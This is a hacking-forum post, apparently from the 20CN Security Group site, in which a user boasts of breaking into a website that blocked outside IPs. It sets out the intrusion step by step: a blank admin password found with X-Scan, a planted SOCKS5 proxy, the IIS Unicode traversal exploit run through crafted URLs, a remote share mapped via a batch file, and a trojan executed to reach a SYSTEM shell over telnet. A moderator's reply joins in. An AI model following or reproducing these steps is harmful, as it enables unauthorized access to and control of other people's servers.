论坛: UNIX系统 标题: 一次限制IP站的入侵 复制本贴地址    
作者: paike [paike]    论坛用户   登录
大家好!初来夹道,没什么好说的,献了小弟前几天一入侵报告。希望大家不要嫌弃。

11。23日晚23:33打开电脑,小猫拨号上网,浏览网页,发现一个站的网页(127.0.1.1)其中一版不能浏览,不过其中内容很感兴趣。后发现次主机不是关的。只是屏蔽了外来IP。
打开X-SCAN扫描IPC$弱口令,终于搞到了(127.0.1.8) N:admin P:<NULL>
赶快上传SNAKE的代理程序,重命名为char.exe,用AT命令开使其5266做为我的SOCK5的代理端口,再下载了SNAKE的代理GUI版本,哈哈,终于可以浏览到那主页了,高兴啊!!!
无聊中………………
打开流光帮我的肉鸡127.0.1.8安装了扫描程序,扫描…………
发现有大名鼎鼎的UNICODE漏洞 主机是NT4.0的,老的一~~~~~~~~~
用流光将CMD。EXE复制到SCRIPTS目录中改为ccc.exe
再用代理打开浏览器,http://127.0.1.1/scripts/ccc.exe?/c+dir+c:\
有文件目录了,可以了
打开TFTP想上传木马,发现不行
想~~~~~~~~~
打开代理的浏览器http://127.0.1.1/scripts/ccc.exe?/c+echo+net+user+\\127.0.0.8\ipc$+""+/user:"admin"+>gg.bat
  http://127.0.1.1/scripts/ccc.exe?/c+echo+z:+\\127.0.0.8\c$+>>gg.bat(共巷肉鸡)  
  http://127.0.1.1/scripts/ccc.exe?/c+gg  
哈哈,回到流光用copy z:\server.exe c:\inerpub\scripts\111.exe
  http://127.0.1.1/scripts/ccc.exe?/c+111  
其中server.exe是我事先放到我的肉鸡的木马
OK,打开我的CMD
telnet 127.0.1.1 5277
哈哈,真爽,竟然是system登陆的!


写完了,发现竟然在UNIX区,不管了,希望斑竹不介意!


[此贴被 paike(paike) 在 12月1日1时0分 编辑过]

地主 发表时间: 12/1 1:15

回复: quest [quest]   版主   登录
有admin 了,你把文章down下来看不是更爽了吗?

B1层 发表时间: 12/05 09:02

论坛: UNIX系统

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号